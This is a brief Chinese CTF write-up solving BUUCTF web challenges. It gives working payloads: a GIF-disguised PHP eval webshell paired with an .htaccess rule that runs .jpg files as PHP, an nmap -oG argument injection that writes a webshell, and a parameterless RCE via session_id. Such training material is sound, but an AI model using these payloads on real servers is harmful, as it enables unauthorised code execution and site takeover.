1. [GXYCTF2019]BabyUpload

这道题和前面的一样,后缀检查会把带ph的给截胡,后缀换成jpg
直接用  GIF89a<script language="php">eval($_POST["a"]); </script>
在上传一个配置文件 .htaccess   内容  AddType application/x-httpd-php .jpg ,将jpg文件按照php文件解析
webshell工具链接即可

2.[BUUCTF 2018]Online Tool

重点在下面这两个函数
nmap有一个参数-oG可以实现将命令和结果写到文件所以我们可以控制自己的输入写入文件,可以直接命令 cat flag,也可以写个一句话进去
payload:   ?host=' <?php eval($_POST["a"]);?> -oG test.php '
去构造的盒子里用webshell链接


3. [RoarCTF 2019]Easy Java

没有码过java,还没得搞懂这道题,先放这里。

4. [GXYCTF2019]禁止套娃

考察无参数RCE
页面什么也没有,访问flag.php页面没有报错,说明存在这个文件
这种啥提示都没的,先去dirsearch一下,很有可能扫到点什么,也很有可能是git泄露
我直接拿githack上扫,拿到了index.php
index.php源码

过滤的相当充分了,伪协议一个不剩
使用session_id,
payload: ?exp=readfile(session_id(session_start()));
bp添加session:
得到flag